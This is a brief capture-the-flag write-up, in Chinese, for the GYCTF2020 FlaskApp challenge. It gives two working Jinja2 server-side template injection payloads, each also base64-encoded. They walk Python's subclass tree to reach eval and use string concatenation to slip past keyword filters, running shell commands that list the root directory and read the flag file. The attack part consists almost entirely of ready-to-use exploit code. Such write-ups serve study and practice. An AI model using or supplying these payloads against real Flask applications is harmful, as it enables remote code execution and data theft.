Single

[GYCTF2020]FlaskApp(模板注入)2 min read

输入e3sxKzF9fQ=={{1+1}})进行解密,结果为2,说明可以解析,存在模板注入。

经测试,过滤了flag(ZmxhZyA=),import,os,eval等关键词。

学到了,利用拼接找目录:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

#eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX0NCnslIGlmIGMuX19uYW1lX18gPT0gJ2NhdGNoX3dhcm5pbmdzJyAlfQ0KICB7JSBmb3IgYiBpbiBjLl9faW5pdF9fLl9fZ2xvYmFsc19fLnZhbHVlcygpICV9DQogIHslIGlmIGIuX19jbGFzc19fID09IHt9Ll9fY2xhc3NfXyAlfQ0KICAgIHslIGlmICdldmEnKydsJyBpbiBiLmtleXMoKSAlfQ0KICAgICAge3sgYlsnZXZhJysnbCddKCdfX2ltcG9yJysndF9fJysnKCJvJysncyIpJysnLnBvcGUnKyduJysnKCJscyAvIikucmVhZCgpJykgfX0NCiAgICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRmb3IgJX0NCnslIGVuZGlmICV9DQp7JSBlbmRmb3IgJX0=

可以注意到存在this_is_the_flag.txt,对其也要进行拼接

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX0NCnslIGlmIGMuX19uYW1lX18gPT0gJ2NhdGNoX3dhcm5pbmdzJyAlfQ0KICB7JSBmb3IgYiBpbiBjLl9faW5pdF9fLl9fZ2xvYmFsc19fLnZhbHVlcygpICV9DQogIHslIGlmIGIuX19jbGFzc19fID09IHt9Ll9fY2xhc3NfXyAlfQ0KICAgIHslIGlmICdldmEnKydsJyBpbiBiLmtleXMoKSAlfQ0KICAgICAge3sgYlsnZXZhJysnbCddKCdfX2ltcG9yJysndF9fJysnKCJvJysncyIpJysnLnBvcGUnKyduJysnKCJjYXQgL3RoaXNfaXNfdGhlX2ZsIisiYWcudHh0IikucmVhZCgpJykgfX0NCiAgICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRmb3IgJX0NCnslIGVuZGlmICV9DQp7JSBlbmRmb3IgJX0=